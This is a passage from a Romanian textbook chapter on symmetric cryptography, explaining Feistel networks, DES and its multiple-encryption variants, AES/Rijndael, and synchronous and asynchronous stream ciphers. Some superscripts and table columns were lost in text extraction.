sau pot fi utilizați alți algoritmi de criptare pentru a realiza schimbul de chei.
Criptografia simetrică modernă utilizează în principiu aceiaşi algoritmi ca şi criptografia
tradiţională (transpoziţia şi substituţia), dar accentul cade pe complexitatea lor. Obiectivul
criptografic din actuala perioadă este de a concepe algoritmi de criptare atât de complecşi şi de
ireversibili încât atacatorul (sau criptanalistul), chiar şi în situaţia în care are la dispoziţie cantităţi
mari de text criptat la alegerea sa, să nu poată face nimic fără cheia secretă. Exemple de cifruri cu
cheie secretă sunt: LUCIFER, DES, IDEA, RC5, A5, HC-256, Rijndael, etc.
Algoritmii criptografici folosiţi în sistemele simetrice de criptare se împart în cifruri bloc
(block ciphers) şi cifruri flux (sau cifruri şir - stream ciphers). Cifrurile flux pot cripta un singur bit
de text clar la un moment dat, pe când cifrurile bloc criptează mai mulţi biţi (64, 128, 256 sau alt
număr de biţi) la un moment dat.

6.2. Algoritmii de tip bloc


Algoritmii de tip bloc criptează mesajul în blocuri de n de biţi. Pentru aceasta se aplică o
funcţie matematică între un bloc de biţi ai textului clar şi cheie (care poate varia ca mărime),
rezultând acelaşi număr de biţi pentru mesajul criptat. Criptarea și decriptarea se realizată astfel
încât să îndeplinească următoarele cerinţe:

2
 cunoscând un bloc de biţi ai textului clar şi cheia de criptare, sistemul să poată genera
rapid un bloc al textului criptat;
 cunoscând un bloc de biţi ai textului criptat şi cheia de criptare/decriptare, sistemul să
poată genera rapid un bloc al textului clar;
 cunoscând blocurile textului clar şi ale textului cifrat, să fie dificil să se genereze cheia.

6.2.1. Cifrul Feistel


Algoritmii de tip bloc sunt foarte des utilizați în criptografia modernă, iar mulți dintre
aceștia se bazează pe o structură numită cifru bloc Feistel (se mai spune reţeaua, uneori schema
Feistel), elaborat de către Horst Feistel1 în anul 1971. Funcția Feistel operează în d runde, de obicei
între 12 și 16 runde. Blocul inițial este împărțit în două blocuri egale (L0, R0), iar în runda i sunt
executate următoarele operații (Figura 6.2):
 funcția de rundă f(i) se aplică la partea dreaptă, obținând f(Ri);
 se calculează Li și Ri nou astfel:
Li = Ri-1,
Ri = Li-1 ⊕ f(Ri-1, Ki ),
unde ⊕ este operația OR exclusiv (XOR), f este funcţia, de obicei tot XOR, şi Ki este cheia de
rundă. Indiferent de natura funcţiei f, decifrarea se face astfel:
Ri-1 = Li
Li-1 = Ri ⊕ f(Li , Ki ).

Figura 6.2. Schema aplicării funcției Feistel în runda i


O structură Feistel are avantajul că cifrarea şi decifrarea sunt foarte similare sau chiar
identice în unele cazuri (ceea ce ne aminteşte de Enigma), cerând doar o reversie a cheii. Astfel,
dimensiunea codului sau circuitului necesar pentru a implementa un astfel de cifru este practic
înjumătăţit. Reţelele Feistel şi construcţii similare combină mai multe „runde” de operaţii repetate
pentru a produce o funcţie care conţine cantităţi mari de date. Pe parcursul acestor runde se
realizează:
 amestecarea de biţi (numită şi permutări pe cutii P);

1
Horst Feistel (30 ianuarie 1915 - 14 noiembrie 1990) - un cercetător-criptograf care a lucrat la dezvoltarea algoritmilor
de criptare la IBM, unul dintre fondatorii criptografiei moderne ca știință. A adus o mare contribuție la studiul
algoritmilor simetrici de criptare și a pus bazele pentru crearea algoritmului de criptare DES.
3
 funcţii simple ne-lineare (numite si substituţii prin cutii S);
 amestecul liniar (în sensul algebrei modulare) utilizând XOR.
Aceste operații, după cum a spus și Claude Shannon, creează „confuzie şi difuzie”.
Amestecarea de biţi creează difuzia, iar substituţia - confuzia. În criptografie confuzia se referă la a
face o relaţie între cheie şi textul cifrat cât de complex şi adânc posibil, iar difuzia este definită ca
proprietatea că redundanţa în statisticele textului clar este disipată în statisticele textului cifrat.
Difuzia este asociata cu dependenţa biţilor de la ieşire de biţii de la intrare. Într-un cifru cu o difuzie
perfecta, doar schimbarea unui bit de la intrare ar schimba întregul text, ceea ce se mai numeşte şi
SAC (Strict Avalanche Criterion). Feistel utilizează cutiile P (P-box sau Permutation-box) şi
amestecul liniar de biţi pentru a atinge o difuzie aproape perfectă şi se poate spune că îndeplineşte
condiţiile SAC.
Cutiile-S (S-box sau Substitution-box) au o importanţă fundamentală în funcţionarea schemei
Feistel. Acestea sunt de obicei folosite pentru a ascunde relaţia dintre cheie şi textul cifrat. În
general, o cutie S ia un număr m de biţi de intrare şi îi transformă într-un număr n de biţi de ieşire,
unde n nu e neapărat egal cu m. O cutie Sm×n poate fi implementată ca un tabel de 2m cuvinte de n
biţi fiecare. În mod normal sunt utilizate tabele fixe, la fel ca în Data Encryption Standard (DES),
dar în unele cifruri tabelele sunt generate dinamic din cheie (de exemplu, Blowfish, Twofish).
Un exemplu elocvent de tabel fix este tabelul de 6×4 - biţi al unei cutii S, și anume S5 din
DES (Tabelul 6.1):
Cei 4 biţi de mijloc ai intrării
S5
0000 0001 0010 0011 0100 0101 0110 0111 1000 1001 1010 1011 1100 1101
00 0010 1100 0100 0001 0111 1010 1011 0110 1000 0101 0011 1111 1101 0000
Biţii
01 1110 1011 0010 1100 0100 0111 1101 0001 0101 0000 1111 1010 0011 1001
exte-
10 0100 0010 0001 1011 1010 1101 0111 1000 1111 1001 1100 0101 0110 0011
riori
11 1011 1000 1100 0111 0001 1110 0010 1101 0110 1111 0000 1001 1010 0100
Tabelul 6.1. Cutia S5 din DES
Fiind dată o intrare de 6 biţi, ieşirea de 4 biţi este găsită prin selectarea liniei, folosind cei
doi biţi exteriori (primul şi ultimul bit), şi a coloanei, utilizând cei patru biţi interiori. De exemplu, o
intrare „011011” are biţii exteriori „01” şi biţii interiori „1101”; ieşirea corespunzătoare va fi
„1001”.
Cutiile de permutare P reprezintă o metodă de amestecare a biţilor, utilizată pentru a
permuta sau transpune biţii în intrările cutiilor S, menţinând difuzia în timpul transpunerii.
Reţele Feistel au fost introduse pentru prima dată, în domeniul comercial, în cifrul Lucifer
de la IBM care a fost conceput de însuşi Feistel şi Don Coppersmith. Reţele Feistel au câştigat
respect atunci când guvernul SUA a adoptat standardul DES de criptare a datelor care, datorită
naturii iterative a construcţiei Feistel, face foarte simple implementările sistemului de criptare în
electronică.

4
Construcţia Feistel este utilizată şi în unii algoritmi care nu sunt cifruri pe blocuri. De
exemplu, Optimal Asymmetric Encryption Padding (OAEP) utilizează o reţea Feistel simplă pentru
a randomiza textele cifrate în unele scheme de cifrare asimetrică.
Dată fiind natura cifrului Feistel, textul cifrat sparge orice convenţie de caractere şi produce
numere ce corespund la caractere care nu există. De fapt orice tip de cifru care operează pe blocuri
de text sau pe biţi individuali nu avea cum să respecte standardul de caractere. Din această cauză se
utilizează la ieşire un codor pentru a reda textului cifrat proprietatea de lizibilitate şi implicit pentru
a putea fi transmis prin sistemele informatice.

6.2.2. Algoritmul DES


Plecând de la algoritmul “Lucifer”, conceput în Laboratoarele IBM, a fost dezvoltat
algoritmul de criptare DES (Data Encryption Standard), primul standard de criptare cu cheie
simetrică făcut public de guvernul SUA. Algoritmul a fost conceput pentru guvernul Statelor Unite
dar şi pentru folosinţă publică.
În mai 1973, revista Federal Register a sintetizat principiile care trebuie să stea la baza
proiectării unui algoritm criptografic standard:
 algoritmul trebuie să asigure un înalt nivel de securitate;
 algoritmul trebuie să fie complet specificat şi simplu de înţeles;
 securitatea algoritmului trebuie să fie asigurată de cheie şi nu trebuie să depindă de
păstrarea secretă a algoritmului;
 algoritmul trebuie să fie disponibil tuturor utilizatorilor;
 algoritmul trebuie să fie adaptabil pentru diverse aplicaţii;
 algoritmul trebuie să fie implementabil pe dispozitivele electronice;
 algoritmul trebuie să fie eficient în utilizare;
 algoritmul trebuie să poată fi validat;
 algoritmul trebuie să fie exportabil.

DES a fost oficial adoptat ca standard federal la 23 noiembrie 1976, iar în 1977 specificaţiile
sale au fost făcute publice. Toate operațiile de transformare prezente în DES sunt definite în
specificațiile standardului publicat și nu prezintă o informație secretă. Algoritmul DES este o
combinaţie complexă, folosind substituţia şi permutarea (transpoziţia). Acest cifru bloc acceptă un
bloc de 64 de biţi la intrare şi generează un bloc cifrat de 64 de biţi. Algoritmul este constituit din
16 cicluri repetate (runde) ale blocurilor fundamentale. Textul iniţial este descompus în blocuri de
64 de biţi. Cheia este de 64 biţi din care doar 56 sunt efectivi, ceilalţi fiind biţi de paritate.
Algoritmul foloseşte numai operaţii aritmetice şi logice clasice cu un număr de până la 64 de
biţi, ceea ce face relativ uşor de implementat atât software cât mai ales hardware: unul din scopurile

5
declarate ale algoritmului fiind uşoara lui implementare hardware într-un cip specializat.
Parcurgerea celor 16 cicluri are loc după schemele din figurile 6.3 și 6.5.

Criptare Decriptare
Text clar Text cifrat Blocul R (32 biți) Cheia de rundă (48 biți)

48 biți

48 biți

32 biți

32 biți

Text cifrat Text clar


Figura 6.3 Detalii pentru folosirea Figura 6.4 Schema generală a funcției Feistel în
algoritmului DES DES

La intrare datele sunt împărţite în blocuri de 64 biţi, care sunt transformate folosind cheia de
64 de biţi. Cei 64 de biţi sunt permutaţi prin „permutarea iniţială IP” și separați în două, „jumătatea
stângă L0” şi “jumătatea dreaptă R0”, fiecare de 32 de biţi. În continuare, urmează operaţiile ce
constituie un ciclu. Cheia este deplasată la stânga cu un număr de biţi şi permutată: ea se combină
cu “partea dreaptă” care apoi se combină cu “partea stângă”, iar rezultatul devine noua “parte
dreaptă”; vechea “parte dreaptă” devine noua “parte stângă”. După repetarea acestui ciclu de 16 ori
se face permutarea finală care este inversă permutării iniţiale, obținând forma binară a blocului
cifrat.
La fiecare ciclu practic au loc patru operaţii separate:
1. partea dreaptă este expandată de la 32 la 48 biţi (permutarea expandată E);
2. partea dreaptă este combinată cu cheia de rundă (operația XOR);
3. rezultatul este substituit şi condensat în 32 biţi (cutiile S);
4. cei 32 biţi sunt permutaţi (permutarea P) şi apoi combinaţi cu partea stângă (XOR)
pentru a da o nouă parte dreaptă.
Cheia de 64 biți este supusă unei permutări PC-1, devenind de 56 de biți, fiind excluși biții
de paritate. Apoi este împărţită în două părţi de 28 biţi fiecare, c0 și d0, deplasate la stânga cu un

6
număr specificat de biţi apoi reunite şi 48 din cei 56 de biţi sunt permutaţi (permutarea PC-2) şi
folosiţi ca o cheie de 48 de biţi (din totalul de 16 chei) de-a lungul ciclului (figura 6.5, b).

a) b)

Figura 6.5. a) Schema generală a algoritmului DES, b) Schema unei runde DES și generarea cheii

Datorită lungimii cheii de lucru şi a operaţiilor elementare pe care le foloseşte algoritmul, nu


se ridică probleme deosebite într-o implementare software; singura observaţie este că, datorită
modulului de lucru (cu secvenţe de date, cu tabele) practic algoritmul este lent într-o implementare
software. Modul de concepere îl face însă perfect implementabil hard (într-un cip) ceea ce s-a şi
realizat, existând multiple variante de maşini hard de criptare.
Criptanaliza DES. Deşi DES a fost cel mai celebru algoritm al secolului XX este considerat
la această oră nesigur pentru multe aplicaţii. Pare paradoxal, dar aceasta este consecinţa măririi
considerabile a puterii de calcul de la confirmarea DES-ului ca un standard criptografic şi până în
anul 1997, când a fost anunțat concursul pentru noul standard de criptare simetrică. Slăbiciunea
pleacă de la lungimea prea mică a cheii de 56 de biţi. Insecuritatea DES-ului pleacă de la premiza
că un atac “în forţă” are şanse de reuşită în condiţiile puterii de calcul disponibile astăzi; până în
2004 cel mai eficient atac este datorat criptanalizei liniare care, folosind 243 texte cunoscute,
generează o complexitate temporală de 239-43; în condiţiile unui atac cu text ales complexitatea poate
fi redusă de patru ori.

7
Odată ce DES a devenit vulnerabil au fost aprobate câteva versiuni mai sigure ale DES,
implementate pe aceleași platforme ca și DES simplu: 3DES, DES-X, RDES și altele.
DES multiplu. Când s-a descoperit că cheile pe 56 de biți folosite de DES nu sunt suficiente
pentru a proteja împotriva atacurilor „brute force”, au fost folosite variantele 2DES şi 3DES ca
modalităţi simple de a mări spațiul cheilor fără nevoia de a trece la un nou algoritm.
2DES constă în două acționări succesive ale algoritmului DES, cu două chei DES diferite
sau egale. Utilizarea sa este pur didactică deoarece este vulnerabilă la atacurile cu întâlnire la mijloc
(meet-in-the-middle attack). 2DES este exemplul cel mai des folosit pentru a demonstra viabilitatea
unui astfel de atac, dar valoarea sa practică este aproape de zero.
Utilizarea a trei pași este esențială pentru a evita atacurile cu întâlnire la mijloc, deoarece
textul cifrat rezultat este mult mai greu de spart folosind căutarea exhaustivă (forţa brută): 2 112
încercări în loc de 256 încercări.
Cea mai simplă variantă de 3DES funcționează astfel:
C = DES(k3; DES(k2; DES(k1; M))),
unde M este blocul în clar, iar k1, k2 şi k3 sunt cheile DES. Această variantă este cunoscută sub
notația EEE deoarece toate cele trei operațiuni efectuate cu cheile sunt criptări. Pentru a simplifica
interoperabilitatea între DES și 3DES, pasul din mijloc se înlocuiește de obicei cu decriptarea
(modul EDE):
C = DES(k3; DES –1(k2; DES(k1; M))),
și astfel o singură criptare DES cu cheia k poate fi reprezentată ca 3DES-EDE cu cheile k1=k2=k3=k.
Alegerea decriptării pentru pasul al doilea nu afectează securitatea algoritmului.
O variantă, numită 3DES cu două chei, folosește k1=k3, reducând astfel lungimea cheii la
112 biți și lungimea de stocare la 128 de biți. Totuși, acest mod de funcționare este susceptibil la
unele atacuri cu text clar ales sau text clar cunoscut și astfel este considerat de NIST 2 ca având
securitate echivalentă cu doar 80 de biți.
Pe 26 mai 2002, DES a fost înlocuit de AES, Advanced Encryption Standard, după o
competiție publică. Chiar și din 2004, DES încă a rămas folosit pe scară largă, iar pe 19 mai 2005,
el a fost retras oficial.

6.2.3. Algoritmul AES


În ianuarie 1997 NIST a organizat un concurs de criptografie deschis cercetătorilor din
întreaga lume, având ca subiect crearea unui nou standard, care urma să se numească AES –
Advanced Encryption Standard. Regulile concursului erau:
 algoritmul să fie un cifru bloc simetric;
 proiectul trebuia să fie public;

2
National Institute of Standards and Technology
8
 AES trebuia să suporte chei de 128, 192 şi 256 biţi;
 algoritmul trebuia să se poată implementa atât hardware cât şi software;
 AES trebuia să fie un standard public sau oferit cu licenţă nediscriminatorie.
În august 1998 NIST a selectat cinci finalişti pe criterii de securitate, eficienţă, flexibilitate şi
cerinţe de memorie. Finaliştii au fost:
1. Rijndael (Joan Daemen şi Vincent Rijmen, 86 de voturi),
2. Serpent (Ross Anderson, Eli Biham, Lars Knudsen, 56 voturi),
3. Twofish (echipa condusă de Bruce Schneier, 31 voturi),
4. RC6 (RSA Laboratories, 23 voturi),
5. MARS (IBM, 13 voturi),
În octombrie 2000 NIST a stabilit câştigătorul. Acesta este algoritmul Rijndael, dezvoltat de
doi tineri cercetători belgieni, Joan Daemen şi Vincent Rijmen şi care devine standard
guvernamental al SUA. Se spera ca Rjindael să devină standardul criptografic dominant în lume
pentru următorii 10 ani, AES depășind așteptările, rămânând și astăzi în topul algoritmilor de
criptare cu cheie secretă utilizați în diverse țări și domenii.
Rijndael permite lungimi de chei şi mărimi de blocuri de la 128 de biţi la 256 de biţi, în paşi
de câte 32 de biţi. Lungimea cheii şi lungimea blocului pot fi alese în mod independent, dar în
practică se presupunea folosirea a două variante: bloc de 128 biţi cu cheie de 128 biţi şi bloc de 128
biţi cu cheie de 256 biţi. Standardul comercial trebuia să devină cel mai probabil varianta 128/128.
O cheie de 128 biţi permite un spaţiu al cheilor de 2128 chei. În final s-a decis ca în AES numărul de
runde să depindă numai de mărimea cheii, fiind 10 pentru cazul cheii de 128 biți, 12 pentru 192 biți
şi 14 pentru 256 biți, lungimea blocului fiind aceeași în toate cazurile – 128 biți.
Preliminarii matematice. O descriere matematică detaliată nu este scopul acestui
compartiment, limitându-ne la o scurtă descriere teoretică, mai ales că pentru toate operațiile
definite în AES sunt elaborate diverse tabele care simplifică lucrurile pentru cei neinițiați în teorie,
care, de altfel, este destul de complicată și voluminoasă pentru a fi inclusă în acest manual.
Rijndael se bazează pe teoria câmpului Galois, în sensul că anumite operaţiuni sunt definite
la nivel de octet iar octeţii reprezintă elemente în câmpul finit GF(28). Cum toate reprezentările
câmpului finit GF(28) sunt izomorfe, se poate alege reprezentarea clasică polinomială, cu impact
pozitiv asupra complexităţii implementării.
Octetul b, format din biţii b7, b6, b5, b4, b3, b2, b1 şi b0, este considerat ca fiind un polinom de
gradul 7 cu coeficienţi 0 sau 1:
b7 x7 + b6 x6 + b5 x5 + b4 x4 + b3 x3 + b2 x2 + b1 x + b0
Operaţia de adunare este definită ca suma a două polinoame în care coeficienţii se adună
modulo 2 şi care corespunde operării XOR a celor doi octeţi corespondenţi. Sunt îndeplinite

9
axiomele grupului abelian: operaţia este internă, asociativă, comutativă, există element neutru şi
element invers.
Operaţia de înmulţire corespunde produsului a două polinoame modulo m, unde m este un
polinom ireductibil de grad 8 şi care pentru AES este
m(x) = x8 + x4 + x3 + x + 1.
Înmulţirea este internă (rezultatul este un polinom de grad strict mai mic ca 8), asociativă şi
există element neutru. Elementul invers se determină cu algoritmul lui Euclid, iar distributivitatea
celor doua operaţii se verifică.
Concluzia este că mulţimea celor 256 de valori posibile ale unui octet, împreună cu cele
două operaţiuni definite mai sus formează un câmp algebric finit, respectiv GF(28).
În proiectarea AES s-a ţinut cont de trei criterii:
 rezistenţa împotriva tuturor atacurilor cunoscute;
 viteza şi compactitatea codului pe un mare număr de platforme;
 simplicitatea proiectării.
Ca şi DES, AES foloseşte substituţii şi permutări, ca şi runde multiple. Spre deosebire de
DES, toate operaţiile sunt la nivel de octet, pentru a permite implementări hardware şi software
eficiente.
În algoritmul AES rezultatul cifrat intermediar este numit vector state, care poate fi
reprezentat ca un tabel cu patru linii şi patru coloane, acestea fiind numerotate începând de la 0.
Vectorul state se iniţializează cu blocul de 128 biţi de text clar (în ordinea coloanelor, cu primii
patru octeţi în coloana 0) şi va fi modificat la fiecare pas al calculului, prin substituţii, permutări şi
alte transformări, rezultând în final blocul de 128 biţi de text cifrat.
Deoarece fiecare pas este reversibil, decriptarea se poate realiza prin rularea algoritmului de
la coadă la cap, sau prin rularea algoritmului de criptare nemodificat, dar folosind tabele diferite
(Figura 6.6).

10
Figura 6.6. Cifrarea și decifrarea AES

Generarea cheilor de rundă AES. Cheia de 128 de biţi este expandată în 11 tabele 4x4.
Expandarea este realizată prin rotiri repetate şi operaţii XOR asupra unor grupuri de biţi din cheia
originală. Înainte de a începe cele 10 runde, cheia se operează XOR cu vectorul state (Figura 6.7).

Figura 6.7. Expandarea cheii AES

Calculul principal constă în execuţia a 10 runde, folosind cheia ki la iteraţia i. Fiecare rundă
constă în patru paşi, cu excepția ultimei, în care este omis pasul 3 de amestecare a coloanelor.

11
Pasul 1, the Byte Sub (BS) step (figura 6.8), realizează o substituţie octet cu octet asupra
vectorului state folosind o cutie S.

Figura 6.8. Transformarea Byte Sub


În acest pas fiecare octet al textului clar este substituit cu un octet extras dintr-o cutie de tip
S. Cutia de tip S este descrisă de o matrice specificată în standardul publicat.
Pasul 2, the Shift Row (SR) step (Figura 6.9), roteşte la stânga (left shift) fiecare din cele 4
rânduri ale vectorului state: rândul 0 este rotit cu 0 octeţi, rândul 1 este rotit cu 1 octet, rândul 2 este
rotit cu 2 octeţi şi rândul 3 este rotit cu 3 octeţi, realizând difuzia datelor.

Figura 6.9. Transformarea ShiftRows

Pasul 3, the Mix Column (MC) step (Figura 6.10), amestecă fiecare coloană din vectorul
state independent de celelalte, prin înmulţirea coloanei cu o matrice constantă, multiplicarea fiind
realizată folosind câmpul finit Galois GF(28).

Figura 6.10. Transformarea MixColumns

Pasul 4, the Add Round Key step, operează XOR cheia rk din runda respectivă cu vectorul
state (Figura 6.11).

12
Figura 6.11 Transformarea Add Round Key

Pasul AddRoundKey (ARK) este pasul în care este implicată cheia. El constă într-o simplă
operaţie de SAU exclusiv pe biţi între stare şi cheia de rundă (o cheie care este unică pentru fiecare
iteraţie, cheie calculată pe baza cheii secrete). Operaţia de combinare cu cheia secretă este una
extrem de simplă şi rapidă, dar algoritmul rămâne complex, din cauza complexităţii calculului
cheilor de rundă (Key Schedule), precum şi a celorlalţi paşi ai algoritmului.
Avantajele AES relativ la implementare sunt (amintim că AES a fost aprobat în 2002):
 AES se poate implementa pe un procesor Pentium Pro3 şi va rula cu o viteză mai mare
decât orice alt cifru bloc;
 AES se poate implementa pe un dispozitiv Smart Card, folosind un spaţiu redus de
memorie RAM şi un număr redus de cicluri;
 transformarea din cadrul unei runde este paralelă prin proiectare, ceea ce constituie un
avantaj pentru viitoarele procesoare;
 AES nu foloseşte operaţii aritmetice, ci doar operaţii la nivel de şiruri de biţi.
Simplitatea proiectării AES:
- AES nu foloseşte componente criptografice externe, cum ar fi cutii S, biţi aleatori sau
şiruri de cifre din dezvoltarea numărului ;
- AES nu îşi bazează securitatea pe interacţiuni obscure sau greu de înţeles între operaţiuni
aritmetice;
- proiectarea clară a AES nu permite ascunderea unei “trape”.
Lungimea variabilă a blocului

3
Pentium Pro este un microprocesor x86 de generația a șasea, dezvoltat și fabricat de Intel, introdus în 1 noiembrie
1995. Proprietăți: max. CPU clock rate - 150 MHz to 200 MHz, FSB speeds - 60 MHz to 66 MHz, min. feature size-
0.35 µm to 0.50 µm, microarchitecture- P6, 1 core, socket 8.
13
- lungimile de bloc de 192 şi 256 biţi permit construirea unei funcţii hash iterative
folosind AES ca funcţie de compresie.
Extensii:
- proiectarea permite specificarea de variante cu lungimi de blocuri şi lungimi de chei
aflate între 128 şi 256 biţi, în paşi de câte 32 de biţi;
- deşi numărul de runde în AES este fixat în specificaţiile algoritmului, el poate modificat
ca un parametru în cazul unor probleme de securitate.
Limitările AES sunt în legătură cu algoritmul de decriptare:
- algoritmul de decriptare este mai puţin pretabil la implementarea pe un dispozitiv Smart
Card, deoarece necesită mai mult cod şi mai multe cicluri;
- implementarea software a AES foloseşte cod şi/sau tabele diferite pentru algoritmul de
criptare, respectiv decriptare;
- implementarea hardware a AES a algoritmului de decriptare refoloseşte doar parţial
circuitele care implementează algoritmul de criptare.
Rijndael, ca și toți ceilalți algoritmi ajunși în etapa finală de selecție pentru standardul AES,
a fost revizuit de NSA4 și, ca și ceilalți finaliști, este considerat suficient de sigur pentru a fi folosit
la criptarea informațiilor guvernamentale americane neclasificate. În iunie 2003, guvernul SUA a
decis ca AES să poată fi folosit pentru informații clasificate. Până la nivelul SECRET, se pot folosi
toate cele trei lungimi de cheie standardizate, 128, 192 și 256 biți. Informațiile TOP SECRET (cel
mai înalt nivel de clasificare) pot fi criptate doar cu chei pe 256 biți.
Atacul cel mai realizabil împotriva AES este îndreptat împotriva variantelor Rijndael cu
număr redus de iterații. AES are 10 iterații la o cheie de 128 de biți, 12 la cheie de 192 de biți și 14
la cheie de 256 de biți, iar cele mai cunoscute atacuri la momentul actual sunt pentru cifruri cu un
număr redus de iterații: 7, 8, respectiv 9 pentru cele trei lungimi ale cheii.
B. Schneier5, unul dintre cei mai de vază criptografi ai momentului, a declarat că deoarece
căutarea permanentă rezultă cu succese pentru criptanalişti, pentru siguranţă, în caz de necesitate, e
recomandată trecerea de la 10 la 16 runde pentru AES-128, de la 12 la 20 pentru AES 192 şi de la
14 la 28 pentru AES-256.

6.3. Algoritmi simetrici de tip şir


Cifrurile şir (sau cifruri fluide - stream cyphers), la fel ca cifrurile bloc, formează o clasă
importantă de algoritmi de criptare. Ceea ce le caracterizează şi le diferenţiază faţă de cifrurile bloc
este faptul că cifrurile şir procesează textul clar în unităţi oricât de mici, chiar bit cu bit, aplicând
funcţia XOR între biţii cheii şi biţii de cifrat, iar funcţia de criptare se poate modifica pe parcursul
4
National Security Agency
5
Bruce Schneier (n. 15 ianuarie 1963, New York) este un criptograf și scriitor american, specialist în securitatea
informatică, autor al câtorva cărți de referință în domeniile sale de specialitate.
14
criptării. Cifrurile şir sunt algoritmi cu memorie, în sensul că procesul de criptare nu depinde doar
de cheie şi de textul clar, ci şi de starea curentă. În cazul în care probabilitatea erorilor de transmisie
este mare, folosirea cifrurilor şir este avantajoasă deoarece au proprietatea de a nu propaga erorile.
Ele se folosesc şi în cazurile în care datele trebuie procesate una câte una, datorită lipsei de spaţiu
de memorie.
Reamintim că într-un sistem de criptare bloc elementele succesive ale textului clar sunt
criptate folosind aceeaşi cheie k. Adică dacă M  m1m2 m3 ... este textul clar, atunci textul criptat este

C  c1c2 c3 ...  ek (m1 )ek (m2 )ek (m3 )... , unde m1, m2, …, sunt blocuri ale textului clar. Pentru cifrurile
fluide avem o situație diferită, acolo fiind utilizate cheile fluide.
Cheia fluidă (keystream) este un flux de caractere aleatoare sau pseudoaleatoare6 de forma
k=k1k2k3…, care sunt combinate cu un text clar pentru a produce un text criptat. Elementele ki ale
cheii fluide pot fi biți, octeți, numere sau caractere reale, cum ar fi A, B,…, Z, în funcție de caz. De
obicei, pentru a produce textul cifrat, fiecare element al cheii fluide este supus operației de adunare,
scădere sau XOR cu un element al textului clar, folosind aritmetica modulară.
Un algoritm de criptare care criptează un text clar m = m1m2m3… în textul cifrat
C  c1c2 c3 ...  ek1 (m1 )ek2 (m2 )ek3 (m3 )... ,

se numeşte algoritm fluid de criptare, unde k=k1k2k3… este o cheie fluidă, iar m1, m2, m3, … -
elemente ale textului clar.
Problema principală în sistemele fluide de criptare o reprezintă generarea cheii de criptare.
Aceasta se poate realiza fie aleator, fie pe baza unui algoritm care pleacă de la o secvenţă mică de
chei de criptare. Un astfel de algoritm se numeşte generator de chei fluide, care este de fapt un
generator de numere pseudo-aleatoare7.
Algoritmii simetrici de tip şir se împart în două clase mari: cifruri şir sincrone şi cifruri şir
asincrone.

6.3.1. Cifruri şir sincrone


Un cifru şir sincron generează şirul de chei independent de textul clar şi de textul cifrat.
Criptarea în acest caz poate fi descrisă de următoarele ecuaţii:
Si+1 = f (Si , k),
zi = g (Si , k),
ci = h (zi , mi),
6
Pseudoaleator – care satisface unul sau mai multe teste statistice pentru randomizare, dar este produs printr-o
procedură matematică definită (spre exemplu de o formulă).
7
Un generator de numere pseudoaleatoare (pseudorandom number generator - PRNG), este un algoritm pentru
generarea unei secvențe de numere ale căror proprietăți aproximează proprietățile secvențelor de numere aleatoare.
Secvența generată de PRNG nu este cu adevărat aleatoare, deoarece este complet determinată de o valoare inițială, care
poate include valori cu adevărat aleatorii. Cu toate că secvențele care sunt mai aproape de aleatoriu cu adevărat pot fi
generate folosind generatoare de numere aleatoare, generatoarele de numere pseudo-numere sunt importante în practică
pentru viteza lor de generare a numerelor și reproductibilitatea lor.
15
unde i = 0, 1, 2, … l, iar l reprezintă lungimea mesajului.
În această formulă starea iniţială S0 se determină din cheia k, f este funcţia de stare, g este
funcţia care produce şirul de chei z, iar h este funcţia de ieşire, care combină şirul de chei cu textul
clar mi pentru obţinerea textului cifrat ci .
Printre proprietăţile cifrurilor şir sincrone se numără:
 sincronizarea – atât expeditorul cât şi destinatarul trebuie să fie sincronizaţi, în sensul de
a folosi aceeaşi cheie şi a opera cu aceeaşi stare respectiv, astfel încât să fie posibilă o
decriptare corectă; dacă sincronizarea se pierde prin inserarea sau lipsa unor biţi din
textul cifrat transmis, atunci decriptarea eşuează şi poate fi reluată doar prin tehnici
suplimentare de re-sincronizare;
 nepropagarea erorii – un bit de text cifrat care este modificat în timpul transmisiei nu
trebuie să afecteze decriptarea celorlalţi biţi cifraţi;
 atacuri active – ca o consecinţă a sincronizării, inserarea, ştergerea sau retransmisia unor
biţi de text cifrat de către un adversar activ va cauza o pierdere instantanee a
sincronizării şi creşte posibilitatea detectării atacului de către decriptor; ca o consecinţă a
nepropagării erorii, un atacator ar putea să modifice biţi aleşi din textul cifrat şi să afle
exact ce efect au modificările în textul clar; trebuie deci, să se folosească mecanisme
suplimentare de autentificare a expeditorului şi de garantare a integrităţii datelor.

6.3.2. Cifruri şir asincrone


Cifrul şir asincron sau autosincronizabil generează şirul de chei ca o funcţie de cheie şi un
număr de biţi din textul cifrat anterior. Funcţia de criptare în acest caz poate fi descrisă de
următoarele ecuaţii:
Si = (ci-t, ci-t+1, …, ci-1),
zi = g (Si, k),
ci = h (zi, mi),
unde i = 0, 1, 2, … l, iar l reprezintă lungimea mesajului.
În această formulă S0 = (c-t, c-t+1, …, c-1), este starea iniţială (nesecretă), k este cheia, g este
funcţia care produce şirul de chei z, iar h este funcţia de ieşire care combină şirul de chei cu textul
în clar mi pentru a obţine textul cifrat ci.
Cifrurile şir asincrone posedă următoarele proprietăţi:
 auto-sincronizarea – este posibilă dacă unii biţi din textul cifrat sunt şterşi sau adăugaţi,
deoarece decriptarea depinde doar de un număr determinat de biţi cifraţi anterior; astfel de
cifruri sunt capabile să-şi restabilească automat procesul de decriptare corectă după
pierderea sincronizării;

16
 propagarea limitată a erorii – să presupunem că starea unui cifru şir asincron depinde de t
biţi cifraţi anteriori; dacă un singur bit cifrat este modificat, şters sau inserat în timpul
transmisiei, atunci decriptarea a cel mult t biţi următori de text cifrat va fi incorectă, după
care se reia decriptarea corectă;
 atacuri active – limitarea propagării erorii face ca orice modificare a textului cifrat de către
un adversar activ să aibă ca şi consecinţă decriptarea incorectă a altor biţi cifraţi, ceea ce
poate mări posibilitatea ca atacul să fie observat de către decriptor; pe de altă parte, datorită
auto-sincronizării este mai dificil decât în cazul cifrurilor şir sincrone să se detecteze
inserarea, ştergerea sau modificarea unor biţi în textul cifrat; trebuie deci să se folosească
mecanisme suplimentare de autentificare a expeditorului şi de garantare a integrităţii datelor.
 difuzia statisticilor textului în clar – deoarece fiecare bit de text clar influenţează toţi biţii
cifraţi următori, proprietăţile statistice ale textului clar sunt dispersate în textul cifrat; ca o
consecinţă, cifrurile şir asincrone trebuie să fie mai rezistente decât cifrurile şir sincrone faţă
de atacurile bazate pe redundanţa textului clar.

6.3.3. Registre de deplasare cu feedback


Majoritatea cifrurilor flux folosite în practică sunt proiectate folosind registre de
deplasare cu feedback (LFSR – Linear Feedback Shift Registers) care sunt simplu de implementat
software sau hardware. În structura LFSR se regăsesc următoarele elemente: de întârziere, de
adunare modulo 2, de multiplicare scalară modulo 2.
